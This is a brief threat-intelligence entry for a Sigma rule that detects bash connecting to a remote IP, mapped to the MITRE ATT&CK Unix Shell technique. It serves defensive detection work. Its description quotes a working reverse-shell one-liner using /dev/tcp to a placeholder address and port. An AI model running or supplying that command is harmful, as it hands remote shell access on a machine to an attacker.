Linux Reverse Shell Indicator (83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871)

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

Cluster A	Galaxy A	Cluster B	Galaxy B	Level
Linux Reverse Shell Indicator (83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871)	Sigma-Rules	Unix Shell - T1059.004 (a9d4b653-6915-42af-98b2-5758c4ceee56)	Attack Pattern	1
Unix Shell - T1059.004 (a9d4b653-6915-42af-98b2-5758c4ceee56)	Attack Pattern	Command and Scripting Interpreter - T1059 (7385dfaf-6886-4229-9ecd-6fd678040830)	Attack Pattern	2